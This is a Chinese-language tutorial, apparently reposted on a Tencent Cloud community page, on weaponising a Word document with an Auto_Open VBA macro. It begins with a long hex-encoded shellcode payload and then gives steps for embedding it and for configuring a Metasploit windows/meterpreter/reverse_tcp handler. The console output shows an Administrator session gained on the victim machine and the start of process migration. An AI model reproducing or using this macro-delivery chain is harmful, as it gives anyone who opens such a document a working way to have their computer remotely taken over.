&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
*/
&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2C&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H54&H30&H00&H00&H38&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H9C&H00&H45&H78&H69&H74&H50&H72&H6F&H63&H65&H73&H73&H00&H00&H00&H00&H30&H00&H00&H4B&H45&H52&H4E&H45&H4C&H33&H32&H2E&H64&H6C&H6C&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HF0&HEA&HCF&H86&H51&HAC&H6B&H21&HE6&H1F&H53&HFA&H89&H9C&H3A&HB1&HB3&H41&HAD&H79&H63&HCB&HDE&H05&H5E&H7B&H8C&H17&H2B&H0E&H5A&H2B&HEE&H21&H07&HB0&HF5&HD4&H4E&HB0&H5A&H45&H71第一段代码:
- MACRO CODE [ˈmækrəʊ kəʊd] 宏代码
这里开始:
这里结束:
第二段代码 payload。
- 从PAYLOAD DATA开始
注意:
- *号中的内容不要,从这个往下开始复制,如下图所示:
- 一直到最后结束。
2.office新建宏文档并配置宏和payloads
宏明称Auto_Open
复制第一段 code 代码内容到编辑器中,保存后关闭宏编辑器窗口即可。
- 将编辑器中原本的代码全部清空然后将我们生成的代码复制进来然后Ctrl+s 保存退出
复制第二段代码 payload 到 word 正文,然后保存文档。
另存为
MSF 配置侦听[老4件套,没有什么好说的]
msf6 > use exploit/multi/browser/java_jre17_driver_manager
[*] Using configured payload java/meterpreter/reverse_tcp
msf6 exploit(multi/browser/java_jre17_driver_manager) > Interrupt: use the 'exit' command to quit
msf6 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/browser/java_jre17_driver_manager
[*] Using configured payload java/meterpreter/reverse_tcp
msf6 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(multi/handler) > jobs -K
Stopping all jobs...
msf6 exploit(multi/handler) > exploit配置好侦听之后我们打开我们制作的 word 文档
- 文档一旦打开就会执行 payload 连接到MSF,关闭 word 文档之后 session 不受影响。
允许运行宏:
打开之后我们回到 MSF 控制台
可以发现Session 已经建立所以getuid一下
Server username: XUEGOD-FF41538F\Administrator- 发现已经是Administrator
尝试把 payload 转移到其他进程
meterpreter > getpid #获取当前进程 pid
Current pid: 3012
meterpreter > ps #查看进程列表,在 ps 列出的进程列表,倒数第 3 个就是我们进程的 pid
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-12-25,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
